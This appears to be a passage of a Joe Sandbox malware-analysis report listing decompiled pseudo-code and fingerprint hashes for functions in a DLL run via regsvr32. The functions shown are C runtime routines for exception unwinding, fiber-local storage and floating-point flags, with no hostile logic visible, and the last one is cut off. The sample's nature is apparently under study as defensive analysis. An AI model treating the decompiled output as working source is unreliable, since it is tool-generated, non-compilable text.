                                                                                                                                                                                                            C-Code - Quality: 63%
                                                                                                                                                                                                            			E00000001180003B5C(void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
				signed int _v32;
				long long _v40;
				char _v48;
				signed int* _v56;
				void* _t55;
				intOrPtr _t60;
				signed int _t101;
				void* _t109;
				intOrPtr _t111;
				signed int* _t115;
				intOrPtr* _t136;
				void* _t139;
				void* _t142;
				void* _t144;
				void* _t158;
				void* _t159;

				_t109 = _t144;
				 *((long long*)(_t109 + 8)) = __rbx;
				 *((long long*)(_t109 + 0x10)) = __rbp;
				 *((long long*)(_t109 + 0x18)) = __rsi;
				 *((long long*)(_t109 + 0x20)) = __rdi;
				_t136 = __rcx;
				_t139 = __r9;
				_t159 = __r8;
				_t142 = __rdx;
				E00000001180004584(_t55, __r8);
				E00000001180002D40(_t109);
				_t115 = _a40;
				if ( *((intOrPtr*)(_t109 + 0x40)) != 0) goto 0x80003bde;
				if ( *__rcx == 0xe06d7363) goto 0x80003bde;
				if ( *__rcx != 0x80000029) goto 0x80003bc2;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x80003bc6;
				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x80003bde;
				if ( *__rcx == 0x80000026) goto 0x80003bde;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003bde;
				if ((_t115[9] & 0x00000001) != 0) goto 0x80003d6d;
				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x80003c76;
				if (_t115[1] == 0) goto 0x80003d6d;
				if (_a48 != 0) goto 0x80003d6d;
				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x80003c63;
				if ( *__rcx != 0x80000026) goto 0x80003c41;
				_t60 = E00000001180002F2C(_t115, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
				if (_t60 - 0xffffffff < 0) goto 0x80003d8d;
				if (_t60 - _t115[1] >= 0) goto 0x80003d8d;
				r9d = _t60;
				E000000011800040F0(_t109, _t142, __r9, _t115);
				goto 0x80003d6d;
				if ( *_t136 != 0x80000029) goto 0x80003c63;
				r9d =  *((intOrPtr*)(_t136 + 0x38));
				if (r9d - 0xffffffff < 0) goto 0x80003d8d;
				if (r9d - _t115[1] >= 0) goto 0x80003d8d;
				goto 0x80003c31;
				E00000001180002004(r9d - _t115[1], _t109, _t115, __r9, __r9, _t115);
				goto 0x80003d6d;
				if (_t115[3] != 0) goto 0x80003cbe;
				if (( *_t115 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003c9e;
				_t101 = _t115[8];
				if (_t101 == 0) goto 0x80003c9e;
				E00000001180002408(_t109);
				if (_t101 != 0) goto 0x80003cbe;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003d6d;
				if ((_t115[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003d6d;
				if ( *_t136 != 0xe06d7363) goto 0x80003d34;
				if ( *((intOrPtr*)(_t136 + 0x18)) - 3 < 0) goto 0x80003d34;
				if ( *((intOrPtr*)(_t136 + 0x20)) - 0x19930522 <= 0) goto 0x80003d34;
				_t111 =  *((intOrPtr*)(_t136 + 0x30));
				if ( *((intOrPtr*)(_t111 + 8)) == 0) goto 0x80003d34;
				E0000000118000241C(_t111);
				if (_t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)) == 0) goto 0x80003d34;
				_v32 = _a64 & 0x000000ff;
				_v40 = _a56;
				_v48 = _a48;
				_v56 = _t115;
				 *0x80016370(_t158);
				goto 0x80003d72;
				_v32 = _a56;
				_v40 = _a48;
				_v48 = _a64;
				_v56 = _t115;
				E00000001180003328(_a64 & 0x000000ff, 0x80000026, __esi, _t136, _t142, _t159, _t139, _t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)));
				return 1;
			}



















                                                                                                                                                                                                            0x180003b5c
                                                                                                                                                                                                            0x180003b5f
                                                                                                                                                                                                            0x180003b63
                                                                                                                                                                                                            0x180003b67
                                                                                                                                                                                                            0x180003b6b
                                                                                                                                                                                                            0x180003b75
                                                                                                                                                                                                            0x180003b78
                                                                                                                                                                                                            0x180003b7e
                                                                                                                                                                                                            0x180003b81
                                                                                                                                                                                                            0x180003b84
                                                                                                                                                                                                            0x180003b89
                                                                                                                                                                                                            0x180003b8e
                                                                                                                                                                                                            0x180003ba4
                                                                                                                                                                                                            0x180003bac
                                                                                                                                                                                                            0x180003bb0
                                                                                                                                                                                                            0x180003bb6
                                                                                                                                                                                                            0x180003bc0
                                                                                                                                                                                                            0x180003bc4
                                                                                                                                                                                                            0x180003bd2
                                                                                                                                                                                                            0x180003bd8
                                                                                                                                                                                                            0x180003be2
                                                                                                                                                                                                            0x180003bec
                                                                                                                                                                                                            0x180003bfa
                                                                                                                                                                                                            0x180003c04
                                                                                                                                                                                                            0x180003c08
                                                                                                                                                                                                            0x180003c14
                                                                                                                                                                                                            0x180003c1c
                                                                                                                                                                                                            0x180003c25
                                                                                                                                                                                                            0x180003c2b
                                                                                                                                                                                                            0x180003c37
                                                                                                                                                                                                            0x180003c3c
                                                                                                                                                                                                            0x180003c43
                                                                                                                                                                                                            0x180003c45
                                                                                                                                                                                                            0x180003c4d
                                                                                                                                                                                                            0x180003c57
                                                                                                                                                                                                            0x180003c61
                                                                                                                                                                                                            0x180003c6c
                                                                                                                                                                                                            0x180003c71
                                                                                                                                                                                                            0x180003c7a
                                                                                                                                                                                                            0x180003c88
                                                                                                                                                                                                            0x180003c8a
                                                                                                                                                                                                            0x180003c8e
                                                                                                                                                                                                            0x180003c90
                                                                                                                                                                                                            0x180003c9c
                                                                                                                                                                                                            0x180003caa
                                                                                                                                                                                                            0x180003cb8
                                                                                                                                                                                                            0x180003cc4
                                                                                                                                                                                                            0x180003cca
                                                                                                                                                                                                            0x180003cd3
                                                                                                                                                                                                            0x180003cd5
                                                                                                                                                                                                            0x180003cdd
                                                                                                                                                                                                            0x180003cdf
                                                                                                                                                                                                            0x180003cf2
                                                                                                                                                                                                            0x180003d09
                                                                                                                                                                                                            0x180003d18
                                                                                                                                                                                                            0x180003d20
                                                                                                                                                                                                            0x180003d27
                                                                                                                                                                                                            0x180003d2c
                                                                                                                                                                                                            0x180003d32
                                                                                                                                                                                                            0x180003d3f
                                                                                                                                                                                                            0x180003d51
                                                                                                                                                                                                            0x180003d5f
                                                                                                                                                                                                            0x180003d63
                                                                                                                                                                                                            0x180003d68
                                                                                                                                                                                                            0x180003d8c

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                            • API String ID: 851805269-3733052814
                                                                                                                                                                                                            • Opcode ID: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                                                                                                                                            • Instruction ID: ef6ae88387dfa06c815bde898961dd69fb07e80911919095ce8a45e838d8869a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5617F3220078886EBB6CF26E44539877A9F758BD4F18C116EB9847BD5CF38D699C701
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180002A84 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 30%
                                                                                                                                                                                                            			E00000001180002A84(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
				void* _t76;
				void* _t83;
				void* _t84;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t113;
				void* _t118;
				void* _t130;
				long long _t133;
				intOrPtr* _t135;
				signed long long _t144;
				void* _t150;
				signed long long _t154;
				void* _t156;
				long long _t158;
				intOrPtr* _t159;
				void* _t161;
				void* _t162;
				signed long long _t166;
				void* _t170;
				intOrPtr _t171;
				void* _t173;
				void* _t174;
				void* _t176;
				void* _t178;
				void* _t180;
				intOrPtr* _t181;

				_t130 = __rax;
				 *((long long*)(_t161 + 8)) = __rbx;
				 *((long long*)(_t161 + 0x10)) = _t158;
				 *((long long*)(_t161 + 0x18)) = __rsi;
				_t162 = _t161 - 0x40;
				_t159 = __rcx;
				_t181 = __r9;
				_t174 = __rdx;
				E00000001180004584(_t76, __r8);
				_t171 =  *((intOrPtr*)(__r9 + 8));
				_t135 =  *((intOrPtr*)(__r9 + 0x38));
				_t178 =  *__r9 - _t171;
				_t103 =  *((intOrPtr*)(__r9 + 0x48));
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x80002bac;
				 *((long long*)(_t162 + 0x30)) = __rcx;
				 *((long long*)(_t162 + 0x38)) = __r8;
				if (_t103 -  *_t135 >= 0) goto 0x80002c58;
				_t154 = __r8 + __r8;
				if (_t178 - _t130 < 0) goto 0x80002b9e;
				if (_t178 - _t130 >= 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t154 * 8)) == 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(_t135 + 0xc + _t154 * 8)) == 1) goto 0x80002b2a;
				_t113 =  *((long long*)(_t130 + _t171))(_t180, _t176, _t173, _t170, _t150);
				if (_t113 < 0) goto 0x80002ba5;
				if (_t113 <= 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0x80002b5b;
				if ( *0x800164f8 == 0) goto 0x80002b5b;
				if (E0000000118000F7F0(_t130 + _t171, _t135, 0x800164f8) == 0) goto 0x80002b5b;
				_t83 =  *0x800164f8();
				r8d = 1;
				_t84 = E00000001180004550(_t83, _t159 + _t171, _t174);
				_t101 =  *((intOrPtr*)(_t135 + 0x10 + _t154 * 8));
				r9d =  *_t159;
				 *((long long*)(_t162 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
				_t133 =  *((intOrPtr*)(_t181 + 0x28));
				 *((long long*)(_t162 + 0x20)) = _t133;
				__imp__RtlUnwindEx();
				E00000001180004580(_t84);
				goto 0x80002ada;
				goto 0x80002c5d;
				_t156 =  *((intOrPtr*)(_t181 + 0x20)) - _t171;
				goto 0x80002c4e;
				_t144 = _t174 + _t174;
				if (_t178 - _t133 < 0) goto 0x80002c4c;
				_t118 = _t178 - _t133;
				if (_t118 >= 0) goto 0x80002c4c;
				r10d =  *(_t159 + 4);
				r10d = r10d & 0x00000020;
				if (_t118 == 0) goto 0x80002c21;
				r9d = 0;
				if (_t101 == 0) goto 0x80002c1c;
				r8d = r9d;
				_t166 = _t159 + _t159;
				if (_t156 - _t133 < 0) goto 0x80002c14;
				if (_t156 - _t133 >= 0) goto 0x80002c14;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t166 * 8)) !=  *((intOrPtr*)(_t135 + 0x10 + _t144 * 8))) goto 0x80002c14;
				if ( *((intOrPtr*)(_t135 + 0xc + _t166 * 8)) ==  *((intOrPtr*)(_t135 + 0xc + _t144 * 8))) goto 0x80002c1c;
				r9d = r9d + 1;
				if (r9d - _t101 < 0) goto 0x80002be4;
				if (r9d != _t101) goto 0x80002c58;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t144 * 8)) == 0) goto 0x80002c35;
				if (_t156 != _t133) goto 0x80002c4c;
				if (r10d != 0) goto 0x80002c58;
				goto 0x80002c4c;
				 *((intOrPtr*)(_t181 + 0x48)) = _t150 + 1;
				r8d =  *((intOrPtr*)(_t135 + 0xc + _t144 * 8));
				 *((long long*)(_t166 + _t171))();
				if (_t103 + 2 -  *_t135 < 0) goto 0x80002bb8;
				return 1;
			}






























                                                                                                                                                                                                            0x180002a84
                                                                                                                                                                                                            0x180002a84
                                                                                                                                                                                                            0x180002a89
                                                                                                                                                                                                            0x180002a8e
                                                                                                                                                                                                            0x180002a9c
                                                                                                                                                                                                            0x180002aa0
                                                                                                                                                                                                            0x180002aa3
                                                                                                                                                                                                            0x180002aac
                                                                                                                                                                                                            0x180002aaf
                                                                                                                                                                                                            0x180002ab4
                                                                                                                                                                                                            0x180002abb
                                                                                                                                                                                                            0x180002abf
                                                                                                                                                                                                            0x180002ac6
                                                                                                                                                                                                            0x180002aca
                                                                                                                                                                                                            0x180002ad0
                                                                                                                                                                                                            0x180002ad5
                                                                                                                                                                                                            0x180002adc
                                                                                                                                                                                                            0x180002ae4
                                                                                                                                                                                                            0x180002aee
                                                                                                                                                                                                            0x180002afb
                                                                                                                                                                                                            0x180002b06
                                                                                                                                                                                                            0x180002b11
                                                                                                                                                                                                            0x180002b24
                                                                                                                                                                                                            0x180002b26
                                                                                                                                                                                                            0x180002b28
                                                                                                                                                                                                            0x180002b31
                                                                                                                                                                                                            0x180002b3b
                                                                                                                                                                                                            0x180002b4b
                                                                                                                                                                                                            0x180002b55
                                                                                                                                                                                                            0x180002b5f
                                                                                                                                                                                                            0x180002b6b
                                                                                                                                                                                                            0x180002b77
                                                                                                                                                                                                            0x180002b7e
                                                                                                                                                                                                            0x180002b85
                                                                                                                                                                                                            0x180002b8a
                                                                                                                                                                                                            0x180002b8e
                                                                                                                                                                                                            0x180002b93
                                                                                                                                                                                                            0x180002b99
                                                                                                                                                                                                            0x180002ba0
                                                                                                                                                                                                            0x180002ba7
                                                                                                                                                                                                            0x180002bb0
                                                                                                                                                                                                            0x180002bb3
                                                                                                                                                                                                            0x180002bba
                                                                                                                                                                                                            0x180002bc4
                                                                                                                                                                                                            0x180002bce
                                                                                                                                                                                                            0x180002bd1
                                                                                                                                                                                                            0x180002bd3
                                                                                                                                                                                                            0x180002bd7
                                                                                                                                                                                                            0x180002bdb
                                                                                                                                                                                                            0x180002bdd
                                                                                                                                                                                                            0x180002be2
                                                                                                                                                                                                            0x180002be4
                                                                                                                                                                                                            0x180002be7
                                                                                                                                                                                                            0x180002bf2
                                                                                                                                                                                                            0x180002bfc
                                                                                                                                                                                                            0x180002c07
                                                                                                                                                                                                            0x180002c12
                                                                                                                                                                                                            0x180002c14
                                                                                                                                                                                                            0x180002c1a
                                                                                                                                                                                                            0x180002c1f
                                                                                                                                                                                                            0x180002c27
                                                                                                                                                                                                            0x180002c2c
                                                                                                                                                                                                            0x180002c31
                                                                                                                                                                                                            0x180002c33
                                                                                                                                                                                                            0x180002c3b
                                                                                                                                                                                                            0x180002c3f
                                                                                                                                                                                                            0x180002c49
                                                                                                                                                                                                            0x180002c52
                                                                                                                                                                                                            0x180002c7a

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                                                                            • Opcode ID: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                                                                                                                                            • Instruction ID: 7da8602e18cf7747c8af8830ce248ccf40cfdad7849785c1bee6e388392e864c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D551BD32601A588AEBAADF15E844B9D37A5F348BC8F51C121FE1A47789DF74DA89C700
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180006108 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                            • Opcode ID: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                                                                                                                                            • Instruction ID: 6c3fae355f4def66f2243ece08b04bf3b1533bf3e7ed4235295a513a2b2c2168
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62F06D75714E0891FB92CB24E8443EA6371EB8DBE1F588215FA6A462F6CF2CC24CC300
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00000001800077FC Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                            			E000000011800077FC(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x8000782e;
				if (sil >= 0) goto 0x8000782e;
				E0000000118000BC4C(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0x80007885;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0x80007849;
				asm("dec eax");
				if (_t42 >= 0) goto 0x80007849;
				E0000000118000BC4C(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0x80007885;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0x80007865;
				asm("dec eax");
				if (_t43 >= 0) goto 0x80007865;
				E0000000118000BC4C(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0x80007885;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0x80007885;
				asm("dec eax");
				if (_t44 >= 0) goto 0x80007885;
				if ((dil & 0x00000010) == 0) goto 0x80007882;
				E0000000118000BC4C(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0x8000789f;
				asm("dec eax");
				if (_t46 >= 0) goto 0x8000789f;
				E0000000118000BC4C(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}













                                                                                                                                                                                                            0x1800077fc
                                                                                                                                                                                                            0x180007801
                                                                                                                                                                                                            0x180007810
                                                                                                                                                                                                            0x180007818
                                                                                                                                                                                                            0x18000781d
                                                                                                                                                                                                            0x180007824
                                                                                                                                                                                                            0x180007829
                                                                                                                                                                                                            0x18000782c
                                                                                                                                                                                                            0x180007833
                                                                                                                                                                                                            0x180007836
                                                                                                                                                                                                            0x180007838
                                                                                                                                                                                                            0x18000783d
                                                                                                                                                                                                            0x18000783f
                                                                                                                                                                                                            0x180007844
                                                                                                                                                                                                            0x180007847
                                                                                                                                                                                                            0x180007849
                                                                                                                                                                                                            0x18000784d
                                                                                                                                                                                                            0x18000784f
                                                                                                                                                                                                            0x180007854
                                                                                                                                                                                                            0x18000785b
                                                                                                                                                                                                            0x180007860
                                                                                                                                                                                                            0x180007863
                                                                                                                                                                                                            0x180007865
                                                                                                                                                                                                            0x180007869
                                                                                                                                                                                                            0x18000786b
                                                                                                                                                                                                            0x180007870
                                                                                                                                                                                                            0x180007876
                                                                                                                                                                                                            0x18000787d
                                                                                                                                                                                                            0x180007882
                                                                                                                                                                                                            0x180007885
                                                                                                                                                                                                            0x180007889
                                                                                                                                                                                                            0x18000788b
                                                                                                                                                                                                            0x180007890
                                                                                                                                                                                                            0x180007897
                                                                                                                                                                                                            0x1800078b5

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                            • Opcode ID: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                                                                                                                                            • Instruction ID: 766be9376166aa195c434f29f3971196c8b67f74f947fd55b9f7e9fcb960d4ba
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D117736F90A0941F7EE9128D45A3E63141AB6C3F4F59C624B66E462E7CF2C4B59C305
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180007FF8 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008017
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008036
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000805E
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000806F
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008080
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                            • Opcode ID: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
                                                                                                                                                                                                            • Instruction ID: be0361fe5fc774fdb93e2323036551c88fb1abd5f2001d1ea80391924f68e359
                                                                                                                                                                                                            • Opcode Fuzzy Hash: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80115B7070924881FADBD32569553E932927F8C7F0F18C324B8B9067DADE69C64D5701
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180007E8C Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                            • Opcode ID: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
                                                                                                                                                                                                            • Instruction ID: 1e63756919ea820504c2c280bc0c9b8fbb4cbfe5ca1be2f3c00cf3ab00ed04ff
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F111397070624D41FAEBE22594527F932826B6D3F0F58CB24B93A0A2C7DE2C9A4D4310
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180003800 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                            			E00000001180003800(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
				void* _t19;
				void* _t27;
				void* _t36;
				void* _t39;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;

				_t27 = _t45;
				 *((long long*)(_t27 + 0x20)) = __rbx;
				 *((long long*)(_t27 + 0x18)) = __r8;
				 *((long long*)(_t27 + 0x10)) = __rdx;
				_t43 = _t27 - 0x3f;
				_t46 = _t45 - 0xc0;
				if ( *__rcx == 0x80000003) goto 0x800038a4;
				E00000001180002D40(_t27);
